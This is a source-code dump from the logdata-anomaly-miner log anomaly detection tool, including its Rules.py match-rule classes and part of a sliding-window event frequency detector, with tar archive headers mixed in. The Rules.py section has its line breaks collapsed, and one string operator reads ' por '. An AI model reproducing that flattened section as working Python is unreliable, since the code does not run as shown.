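                  'The supported format is [path_value_list, old_appeared_time], ' \
                  'where path_value_list is a list of strings with the same length as paths defined in the config.'
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        id_tuple = tuple(event_data[0])
        # Stored times are reduced modulo time_period_length (see add_to_persistence_event), so the time to remove is reduced
        # the same way before it is compared; otherwise a value >= time_period_length could never match.
        new_time = event_data[1] % self.time_period_length
        msg = ''
        if id_tuple not in self.appeared_time_list:
            # Print message if combination of values is new
            msg = f'{id_tuple} has previously not appeared'
        elif not any(abs(new_time - val) < 0.5 for val in self.appeared_time_list[id_tuple]):
            # Print a message if the new time does not appear the list of observed times
            msg = f'Time ({new_time}) does not appear in the previously observed times ' \
                  f'{self.appeared_time_list[id_tuple]} for {id_tuple}'
        else:
            # Remove the old time from the time list; iterate backwards so that deleting does not shift unvisited indices.
            for index in reversed(range(len(self.appeared_time_list[id_tuple]))):
                if abs(new_time - self.appeared_time_list[id_tuple][index]) < 0.5:
                    self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:index] +\
                        self.appeared_time_list[id_tuple][index + 1:]

            # Print a message if the time was removed from the list of observed times
            msg = f'Time ({new_time}) was removed from the range of previously observed times ' \
                  f'{self.appeared_time_list[id_tuple]} for {id_tuple}'

        return msg

    def print(self, message, log_atom, affected_path, additional_information=None):
        """
        Forward message and log atom details to every configured anomaly event handler.

        @param message the human-readable message.
        @param log_atom the log atom the message refers to; its raw_data is decoded with AminerConfig.ENCODING.
        @param affected_path a path or list of paths reported when output_logline is False.
        @param additional_information extra key/value pairs merged into the AnalysisComponent event data.
        """
        if isinstance(affected_path, str):
            affected_path = [affected_path]
        if additional_information is None:
            additional_information = {}
        original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
        if self.output_logline:
            tmp_str = ''
            for x in list(log_atom.parser_match.get_match_dictionary().keys()):
                tmp_str += ' ' + x + os.linesep
            tmp_str = tmp_str.lstrip(' ')
            sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode(AminerConfig.ENCODING)]
            analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())}
        else:
            tmp_str = ''
            for x in affected_path:
                tmp_str += ' ' + x + os.linesep
            tmp_str = tmp_str.lstrip(' ')
            sorted_log_lines = [tmp_str + log_atom.raw_data.decode(AminerConfig.ENCODING)]
            analysis_component = {'AffectedLogAtomPaths': affected_path}
        for key, value in additional_information.items():
            analysis_component[key] = value
        event_data = {'AnalysisComponent': analysis_component}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self)
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/Rules.py000066400000000000000000000606251437606560100325070ustar00rootroot00000000000000"""
This package contains various classes to build check rulesets.

The ruleset also supports parallel rule evaluation, e.g. the two rules "A and B and C" and "A and B and D" will only perform the checks
for A and B once, then performs check C and D and trigger a match action.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .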
""" import datetime import sys import abc import logging from aminer.util.History import LogarithmicBackoffHistory from aminer.util.History import ObjectHistory from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME from aminer import AminerConfig result_string = '%s(%s)' class MatchAction(metaclass=abc.ABCMeta): """This is the interface of all match actions.""" @abc.abstractmethod def match_action(self, log_atom): """ Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ class EventGenerationMatchAction(MatchAction): """This generic match action forwards information about a rule match on parsed data to a list of event handlers.""" def __init__(self, event_type, event_message, event_handlers): self.event_type = event_type self.event_message = event_message self.event_handlers = event_handlers def match_action(self, log_atom): """ Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ event_data = {} for handler in self.event_handlers: handler.receive_event(self.event_type, self.event_message, [log_atom.parser_match.match_element.annotate_match('')], event_data, log_atom, self) class AtomFilterMatchAction(MatchAction, SubhandlerFilter): """This generic match rule forwards all rule matches to a list of AtomHandlerInterface instances using the SubhandlerFilter.""" def __init__(self, subhandler_list, stop_when_handled_flag=False): SubhandlerFilter.__init__(self, subhandler_list, stop_when_handled_flag) def match_action(self, log_atom): """ Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ self.receive_atom(log_atom) class MatchRule(metaclass=abc.ABCMeta): """This is the interface of all match rules.""" log_success = 0 log_total = 0 @abc.abstractmethod def match(self, log_atom): """Check if this rule matches. 
On match an optional match_action could be triggered.""" def log_statistics(self, rule_id): """Log statistics of an MatchRule. Override this method for more sophisticated statistics output of the MatchRule.""" if AminerConfig.STAT_LEVEL > 0: logging.getLogger(STAT_LOG_NAME).info("Rule '%s' processed %d out of %d log atoms successfully in the last 60 minutes.", rule_id, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 if hasattr(self, 'sub_rules'): for i, rule in enumerate(self.sub_rules): rule.log_statistics(rule_id + '.' + rule.__class__.__name__ + str(i)) if hasattr(self, 'rule_lookup_dict'): for i, rule_key in enumerate(self.rule_lookup_dict): rule = self.rule_lookup_dict[rule_key] rule.log_statistics(rule_id + '.' + rule.__class__.__name__ + str(i)) if hasattr(self, 'default_rule'): self.default_rule.log_statistics(rule_id + '.default_rule.' + self.default_rule.__class__.__name__) if hasattr(self, 'sub_rule'): self.sub_rule.log_statistics(rule_id + '.' + self.sub_rule.__class__.__name__) class AndMatchRule(MatchRule): """This class provides a rule to match all subRules (logical and).""" def __init__(self, sub_rules, match_action=None): """ Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action def match(self, log_atom): """ Check if this rule matches. Rule evaluation will stop when the first match fails. If a matchAction is attached to this rule, it will be invoked at the end of all checks. @return True when all subrules matched. 
""" self.log_total += 1 for rule in self.sub_rules: if not rule.match(log_atom): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): result = '' preamble = '' for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = ' and ' return result class OrMatchRule(MatchRule): """This class provides a rule to match any subRules (logical or).""" def __init__(self, sub_rules, match_action=None): """ Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action def match(self, log_atom): """ Check if this rule matches. Rule evaluation will stop when the first match succeeds. If a matchAction is attached to this rule, it will be invoked after the first match. @return True when any subrule matched. """ self.log_total += 1 for rule in self.sub_rules: if rule.match(log_atom): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): result = '' preamble = '' for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = ' or ' return result class ParallelMatchRule(MatchRule): """ This class is a rule testing all the subrules in parallel. From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that matching will not stop after the first positive match. This does only make sense when all subrules have match actions associated. """ def __init__(self, sub_rules, match_action=None): """ Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action def match(self, log_atom): """ Check if any of the subrules rule matches. The matching procedure will not stop after the first positive match. 
If a matchAction is attached to this rule, it will be invoked at the end of all checks. @return True when any subrule matched. """ self.log_total += 1 match_flag = False for rule in self.sub_rules: if rule.match(log_atom): match_flag = True if match_flag and (self.match_action is not None): self.match_action.match_action(log_atom) if match_flag: self.log_success += 1 return match_flag def __str__(self): result = '' preamble = '' for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = ' por ' return result class ValueDependentDelegatedMatchRule(MatchRule): """ This class is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. """ def __init__(self, target_path_list, rule_lookup_dict, default_rule=None, match_action=None): """ Create the rule. @param list with value paths that are used to extract the lookup keys for ruleLookupDict. If value lookup fails, None will be used for lookup. @param rule_lookup_dict dictionary with tuple containing values for valuePathList as key and target rule as value. @param default_rule when not none, this rule will be executed as default. Otherwise, when rule lookup failed, False will be returned unconditionally. @param match_action if None, no action is performed. """ self.target_path_list = target_path_list self.rule_lookup_dict = rule_lookup_dict self.default_rule = default_rule self.match_action = match_action def match(self, log_atom): """ Try to locate a rule for delegation or use the default rule. @return True when selected delegation rule matched. 
""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() value_list = [] for path in self.target_path_list: value_element = match_dict.get(path) if value_element is not None: value_list.append(value_element.match_object) if len(value_list) > 0: value = tuple(value_list) else: value = None rule = self.rule_lookup_dict.get(value, self.default_rule) if rule is None: return False if rule.match(log_atom): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): result = 'ValueDependentDelegatedMatchRule' return result class NegationMatchRule(MatchRule): """Match elements of this class return true when the subrule did not match.""" def __init__(self, sub_rule, match_action=None): self.sub_rule = sub_rule self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 if self.sub_rule.match(log_atom): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): return f'not {self.sub_rule}' class PathExistsMatchRule(MatchRule): """Match elements of this class return true when the given target_path was found in the parsed match data.""" def __init__(self, target_path, match_action=None): self.target_path = target_path self.match_action = match_action def match(self, log_atom): """Check if this rule matches. 
On match an optional match_action could be triggered.""" self.log_total += 1 if self.target_path in log_atom.parser_match.get_match_dictionary(): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f'hasPath({self.target_path})' class ValueMatchRule(MatchRule): """Match elements of this class return true when the given target_path exists and has exactly the given parsed value.""" def __init__(self, target_path, value, match_action=None): self.target_path = target_path self.value = value self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if test_value is not None: if isinstance(self.value, bytes) and isinstance(test_value.match_object, str) and test_value.match_object is not None: test_value.match_object = test_value.match_object.encode() elif isinstance(self.value, str) and isinstance(test_value.match_object, bytes) and self.value is not None: self.value = self.value.encode() elif not isinstance(self.value, type(test_value.match_object)): raise TypeError(f"The type of the value of the ValueMatchRule does not match the test_value. 
value: {type(self.value)}, " f"test_value: {type(test_value.match_object)}") if (test_value is not None) and (test_value.match_object == self.value): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): if isinstance(self.value, bytes): self.value = self.value.decode() return f'value({self.target_path})=={self.value}' class ValueListMatchRule(MatchRule): """Match elements of this class return true when the given path exists and has exactly one of the values included in the value list.""" def __init__(self, target_path, target_value_list, match_action=None): self.target_path = target_path self.target_value_list = target_value_list self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path) if (test_value is not None) and (test_value.match_object in self.target_value_list): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"value({' '.join([str(value) for value in self.target_value_list])}) in {self.target_path}" class ValueRangeMatchRule(MatchRule): """Match elements of this class return true when the given target_path exists and the value is included in [lower, upper] range.""" def __init__(self, target_path, lower_limit, upper_limit, match_action=None): self.target_path = target_path self.lower_limit = lower_limit self.upper_limit = upper_limit self.match_action = match_action def match(self, log_atom): """Check if this rule matches. 
On match an optional match_action could be triggered."""
        self.log_total += 1
        test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
        if test_value is None:
            return False
        test_value = test_value.match_object
        if self.lower_limit <= test_value <= self.upper_limit:
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        return f'value({self.target_path}) inrange ({self.lower_limit}, {self.upper_limit})'


class StringRegexMatchRule(MatchRule):
    """
    Elements of this class return true when the given path exists and the string repr of the value matches the regular expression.

    match_regex must be a compiled pattern object: match() calls its match() method and __str__ reads its pattern attribute.
    """

    def __init__(self, target_path, match_regex, match_action=None):
        self.target_path = target_path
        self.match_regex = match_regex
        self.match_action = match_action

    def match(self, log_atom):
        """
        Check if this rule matches. On match an optional match_action could be triggered.

        @return True when target_path is present in the match dictionary and match_regex matches the match_string of that element.
        Note that pattern.match() only anchors at the start of the string: a rule that is meant to validate the whole value has to end
        its regular expression with $ or \\Z, otherwise any value with a matching prefix is accepted.
        """
        self.log_total += 1
        # None marks a nonexisting entry.
        test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
        if (test_value is None) or (self.match_regex.match(test_value.match_string) is None):
            return False
        if self.match_action is not None:
            self.match_action.match_action(log_atom)
        self.log_success += 1
        return True

    def __str__(self):
        return f'string({self.target_path}) =regex= {self.match_regex.pattern}'


class ModuloTimeMatchRule(MatchRule):
    """
    Match elements of this class return true when the following conditions are met.

    The given target_path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are
    included in [lower, upper] range. In the target_path branch the UTC offset of tzinfo is added before the modulo is taken, i.e. the
    remainder is computed on local time (e.g. seconds_modulo=86400 with [0, 3600] is the first hour of the local day).
    """

    def __init__(self, target_path, seconds_modulo, lower_limit, upper_limit, match_action=None, tzinfo=None):
        """
        @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None, the default
        timestamp associated with the match is used.
        @param seconds_modulo the modulus (in seconds) applied to the timestamp.
        @param lower_limit the inclusive lower bound of the remainder.
        @param upper_limit the inclusive upper bound of the remainder.
        @param match_action optional action that is invoked with the log atom on match.
        @param tzinfo timezone used to shift the parsed timestamp to local time. When None, the fixed-offset local timezone of the
        process at construction time is used (the datetime.timezone returned by astimezone()), so DST changes after construction
        are not followed.
        """
        self.target_path = target_path
        self.seconds_modulo = seconds_modulo
        self.lower_limit = lower_limit
        self.upper_limit = upper_limit
        self.match_action = match_action
        self.tzinfo = tzinfo
        if tzinfo is None:
            self.tzinfo = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo

    def match(self, log_atom):
        """Check if this rule matches. On match an optional match_action could be triggered."""
        self.log_total += 1
        test_value = None
        if self.target_path is None:
            # NOTE(review): this branch uses the atom timestamp as is, without the local-offset shift applied in the else branch;
            # confirm that the asymmetry is intended.
            test_value = log_atom.get_timestamp()
        else:
            time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
            if time_match is None:
                return False
            # The offset is the one valid now, not the one valid at the matched timestamp. With a DST-observing tzinfo the shift can
            # therefore be off by one hour for historic logs; with the fixed-offset default both are identical.
            test_value = time_match.match_object + datetime.datetime.now(self.tzinfo).utcoffset().total_seconds()
        if test_value is None:
            return False
        test_value %= self.seconds_modulo
        if self.lower_limit <= test_value <= self.upper_limit:
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False


class ValueDependentModuloTimeMatchRule(MatchRule):
    """
    Match elements of this class return true when the following conditions are met.

    The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in
    a [lower, upper] range selected by values from the match. The range is looked up in limit_lookup_dict using the match_object of
    the first path of target_path_list that is present in the match (the raw object, not its string representation).
    """

    def __init__(
            self, target_path, seconds_modulo, target_path_list, limit_lookup_dict, default_limit=None, match_action=None, tzinfo=None):
        """
        @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None, the default
        timestamp associated with the match is used.
        @param seconds_modulo the modulus (in seconds) applied to the timestamp.
        @param target_path_list paths whose value selects the limits; only the first present path is used.
        @param limit_lookup_dict maps a value to a (lower, upper) pair of inclusive bounds.
        @param default_limit use this default limit when limit lookup failed. Without a default limit, a failed lookup will cause the
        rule not to match.
        @param match_action optional action that is invoked with the log atom on match.
        @param tzinfo timezone used to shift the parsed timestamp to local time; see ModuloTimeMatchRule for the None default.
        """
        self.target_path = target_path
        self.seconds_modulo = seconds_modulo
        self.target_path_list = target_path_list
        self.limit_lookup_dict = limit_lookup_dict
        self.default_limit = default_limit
        self.match_action = match_action
        self.tzinfo = tzinfo
        if tzinfo is None:
            self.tzinfo = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo

    def match(self, log_atom):
        """Check if this rule matches. On match an optional match_action could be triggered."""
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        value_list = []
        for path in self.target_path_list:
            value_element = match_dict.get(path)
            if value_element is not None:
                value_list.append(value_element.match_object)
        # Only the first present path selects the limits; the remaining collected values are unused.
        if len(value_list) > 0:
            value = value_list[0]
        else:
            value = None
        limits = self.limit_lookup_dict.get(value, self.default_limit)
        if limits is None:
            return False
        test_value = None
        if self.target_path is None:
            test_value = log_atom.get_timestamp()
        else:
            time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
            if time_match is None:
                return False
            # Same caveat as in ModuloTimeMatchRule: the offset is evaluated now, not at the matched timestamp.
            test_value = time_match.match_object + datetime.datetime.now(self.tzinfo).utcoffset().total_seconds()
        if test_value is None:
            return False
        test_value %= self.seconds_modulo
        if limits[0] <= test_value <= limits[1]:
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False


class IPv4InRFC1918MatchRule(MatchRule):
    """
    Match elements of this class return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges.

    This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it.
    The address is expected as an int match_object in host order (10.0.0.1 == 0x0a000001); any other type never matches.
    """

    def __init__(self, target_path, match_action=None):
        self.target_path = target_path
        self.match_action = match_action

    def match(self, log_atom):
        """Check if this rule matches. On match an optional match_action could be triggered."""
        self.log_total += 1
        match_element = log_atom.parser_match.get_match_dictionary().get(self.target_path)
        if (match_element is None) or not isinstance(match_element.match_object, int):
            return False
        value = match_element.match_object
        # The three tests are 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16. Other non-public ranges (127.0.0.0/8, 169.254.0.0/16,
        # 100.64.0.0/10) are deliberately not covered. The value is not checked to be 32 bit wide: bits above bit 31 are ignored
        # by the masks.
        if ((value & 0xff000000) == 0xa000000) or ((value & 0xfff00000) == 0xac100000) or ((value & 0xffff0000) == 0xc0a80000):
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        # NOTE(review): this representation does not mention the RFC1918 check, so the rule is indistinguishable from a plain
        # path-existence rule in rule dumps.
        return f'hasPath({self.target_path})'


class DebugMatchRule(MatchRule):
    """
    This rule can be inserted into a normal ruleset just to see when a match attempt is made.

    It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match
    result is returned.
    """

    def __init__(self, debug_match_result=False, match_action=None):
        # debug_match_result is the constant value returned by match(), so the rule can serve as an always-true or always-false probe.
        self.debug_match_result = debug_match_result
        self.match_action = match_action

    def match(self, log_atom):
        """Check if this rule matches. On match an optional match_action could be triggered."""
        self.log_total += 1
        # repr() escapes non-printable characters, so raw log content cannot inject terminal control sequences into stderr here.
        print(f'Rules.DebugMatchRule: triggered while handling "{repr(log_atom.parser_match.match_element.match_string)}"', file=sys.stderr)
        if self.match_action is not None:
            self.match_action.match_action(log_atom)
        self.log_success += 1
        return self.debug_match_result

    def __str__(self):
        return f'{self.debug_match_result}'


class DebugHistoryMatchRule(MatchRule):
    """
    This rule can be inserted into a normal ruleset just to see when a match attempt is made.

    It just adds the evaluated log_atom to a ObjectHistory. Like DebugMatchRule, the match action is invoked on every evaluation and
    the constant debug_match_result is returned.
    """

    def __init__(self, object_history=None, debug_match_result=False, match_action=None):
        """
        Create a DebugHistoryMatchRule object.

        @param object_history use this ObjectHistory to collect the LogAtoms. When None, a default LogarithmicBackoffHistory for 10 items.
        @param debug_match_result the constant value returned by match().
        @param match_action optional action that is invoked with every evaluated log atom.
        @raise Exception when object_history is neither None nor an ObjectHistory.
        """
        if object_history is None:
            object_history = LogarithmicBackoffHistory(10)
        elif not isinstance(object_history, ObjectHistory):
            msg = 'object_history is not an instance of ObjectHistory'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        self.object_history = object_history
        self.debug_match_result = debug_match_result
        self.match_action = match_action

    def match(self, log_atom):
        """Check if this rule matches. On match an optional match_action could be triggered."""
        self.log_total += 1
        self.object_history.add_object(log_atom)
        if self.match_action is not None:
            self.match_action.match_action(log_atom)
        self.log_success += 1
        return self.debug_match_result

    def get_history(self):
        """Get the history object from this debug rule."""
        return self.object_history
SlidingEventFrequencyDetector.py000066400000000000000000000371341437606560100373040ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module defines a detector for event and value frequency exceedances with a sliding window approach.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
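"""
import os
import logging
from collections import deque

from aminer.AminerConfig import STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class SlidingEventFrequencyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """
    This class creates events when event or value frequencies exceed the set limit.

    For every event (the full parser path list of a log atom, or the combination of values found at target_path_list) the atom_time
    values of the last window_size seconds are kept in a deque. Two kinds of events are reported:
    - the first time the count in the window exceeds set_upper_limit (at most once per window_size per event), and
    - the local maximum of an ongoing exceedance, once the count returns into range, drops by more than
      local_maximum_threshold * set_upper_limit below the maximum, or the maximum is older than one window.
    This detector keeps no persistence: do_timer and do_persist are no-ops.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, scoring_path_list=None, window_size=600,
                 set_upper_limit=None, local_maximum_threshold=0.2, persistence_id='Default', learn_mode=False, output_logline=True,
                 ignore_list=None, constraint_list=None):
        """
        Initialize the detector.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined
        occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler.
        Multiple paths mean that values are analyzed by their combined occurrences.
        @param window_size the length of the time window for counting in seconds.
        @param set_upper_limit sets the upper limit of the frequency test to the specified value. It must be a number: the default None
        is not usable, every comparison in receive_atom would raise TypeError for it.
        @param local_maximum_threshold sets the threshold for the detection of local maxima in the frequency analysis. A local maximum
        occurs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit.
        @param persistence_id name of persistence document (not used: this detector persists nothing).
        @param learn_mode specifies whether new frequency measurements override ground truth frequencies (not read by this module).
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted.
        The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed. Only evaluated when
        target_path_list is empty.
        """
        # Avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config,
            window_size=window_size, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list,
            scoring_path_list=scoring_path_list, set_upper_limit=set_upper_limit, local_maximum_threshold=local_maximum_threshold,
            persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list,
            constraint_list=constraint_list
        )
        # Per-event state, keyed by the event tuple built in _get_log_event.
        self.counts = {}  # deque of atom_time values that are inside the current window
        self.scoring_value_list = {}  # deque of scoring values, trimmed together with counts (see reset_counter)
        self.max_frequency = {}  # highest count observed during the current exceedance, 0 when none is recorded
        self.max_frequency_time = {}  # atom_time at which max_frequency was observed
        self.max_frequency_log_atom = {}  # log atom that produced max_frequency (reported in the event), None when none is recorded
        self.ranges = {}  # NOTE(review): neither written nor read in this class; kept for compatibility
        self.exceeded_frequency_range = {}  # True while the count is above set_upper_limit
        self.exceeded_frequency_range_time = {}  # atom_time of the last "exceeds range for the first time" report

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source and update the sliding window statistics of its event.

        @param log_atom the LogAtom to analyze; its atom_time is the position in the sliding window.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()

        # Skip atoms that contain any path from the ignore list.
        if any(ignore_path in match_dict for ignore_path in self.ignore_list):
            return

        log_event = self._get_log_event(match_dict)
        if log_event is None:
            return

        # Initialize the per-event state at the first occurrence of this event.
        if log_event not in self.counts:
            self.counts[log_event] = deque()
            self.max_frequency[log_event] = 0
            self.max_frequency_time[log_event] = 0
            self.max_frequency_log_atom[log_event] = None
            self.exceeded_frequency_range[log_event] = False
            self.exceeded_frequency_range_time[log_event] = 0
            if len(self.scoring_path_list) > 0:
                self.scoring_value_list[log_event] = deque()

        # atom_time is assumed to be a number; an atom without timestamp (None) would make the comparisons in reset_counter raise
        # TypeError -- TODO confirm the input pipeline always sets it.
        self.counts[log_event].append(log_atom.atom_time)
        if len(self.scoring_path_list) > 0:
            self._record_scoring_values(match_dict, log_event)

        current_frequency = self.get_current_frequency(log_atom, log_event)

        # Track the maximum of the current exceedance together with the atom that produced it.
        if current_frequency > self.set_upper_limit and current_frequency > self.max_frequency[log_event]:
            self.max_frequency[log_event] = current_frequency
            self.max_frequency_time[log_event] = log_atom.atom_time
            self.max_frequency_log_atom[log_event] = log_atom

        # Drop timestamps (and scoring values) that fell out of the window.
        self.reset_counter(log_atom, log_event)

        if not self.exceeded_frequency_range[log_event] and current_frequency > self.set_upper_limit:
            # The limit is exceeded for the first time; report it only if the last such report is more than one window old.
            if self.exceeded_frequency_range_time[log_event] + self.window_size < log_atom.atom_time:
                self.print(log_event, current_frequency, first_exceeded_threshold=True)
                self.exceeded_frequency_range_time[log_event] = log_atom.atom_time
            self.exceeded_frequency_range[log_event] = True
        elif self.exceeded_frequency_range[log_event] and (
                self.max_frequency_time[log_event] + self.window_size < log_atom.atom_time or
                current_frequency <= self.set_upper_limit or
                current_frequency < self.max_frequency[log_event] - self.local_maximum_threshold * self.set_upper_limit):
            # The previous maximum is a local maximum: it lies more than one window in the past, the frequency returned into range,
            # or it dropped by more than local_maximum_threshold * set_upper_limit below the maximum.
            # After a local maximum was reported while the frequency was still above the limit, no new maximum may have been
            # recorded yet (max_frequency_log_atom is None, max_frequency is 0). Reporting in that state would dereference None and
            # divide by zero in print, so such a maximum is only reset, not reported again.
            if self.max_frequency_log_atom[log_event] is not None:
                self.print(log_event, self.max_frequency[log_event], first_exceeded_threshold=False)
            self.max_frequency[log_event] = 0
            self.max_frequency_time[log_event] = 0
            self.max_frequency_log_atom[log_event] = None
            self.reset_counter(log_atom, log_event)

        # Leave the exceedance state once the frequency is back in range.
        if current_frequency <= self.set_upper_limit:
            self.exceeded_frequency_range[log_event] = False

    def _get_log_event(self, match_dict):
        """
        Build the hashable event key of a log atom.

        @param match_dict the match dictionary of the atom's parser match.
        @return a tuple of parser paths when target_path_list is empty, otherwise a tuple of the (string) values found at
        target_path_list; None when the atom must not be analyzed (constraint_list not satisfied, or none of the target paths present).
        """
        if not self.target_path_list:
            # The event is defined by the full path list of the log atom. constraint_list is only enforced in this branch.
            if self.constraint_list and all(match_dict.get(path) is None for path in self.constraint_list):
                return None
            return tuple(match_dict.keys())

        # The event is defined by the combination of the values found at target_path_list.
        values = []
        for path in self.target_path_list:
            match = match_dict.get(path)
            if match is None:
                continue
            # A path can map to a list of match elements (repeated elements); a single element is handled the same way.
            matches = match if isinstance(match, list) else [match]
            for single_match in matches:
                if isinstance(single_match.match_object, bytes):
                    values.append(single_match.match_object.decode(AminerConfig.ENCODING))
                else:
                    values.append(str(single_match.match_object))
        if not values:
            return None
        return tuple(values)

    def _record_scoring_values(self, match_dict, log_event):
        """
        Append the values found at scoring_path_list for the current atom to the scoring deque of log_event.

        One value is appended per scoring path present in the atom, so the deque is only in lockstep with self.counts when exactly one
        scoring path is configured and present in every atom of the event; reset_counter tolerates a shorter scoring deque.
        Unlike _get_log_event, values are not converted to str and list-valued matches are not expanded.
        """
        for scoring_path in self.scoring_path_list:
            scoring_match = match_dict.get(scoring_path)
            if scoring_match is None:
                continue
            if isinstance(scoring_match.match_object, bytes):
                scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING)
            else:
                scoring_value = scoring_match.match_object
            self.scoring_value_list[log_event].append(scoring_value)

    def print(self, log_event, frequency, first_exceeded_threshold=False):
        """
        Send an event to the anomaly event handlers.

        @param log_event the event key whose frequency is reported.
        @param frequency the reported frequency: the current count for a first exceedance, the recorded maximum for a local maximum.
        @param first_exceeded_threshold True for the "exceeds range for the first time" event, False for a local maximum (which adds
        Confidence and Local_maximum_timestamp to the output).
        The reported log atom is self.max_frequency_log_atom[log_event]; callers must make sure it is set. The raw log line is passed
        to the handlers undecoded or as repr(); output sanitation is left to them.
        """
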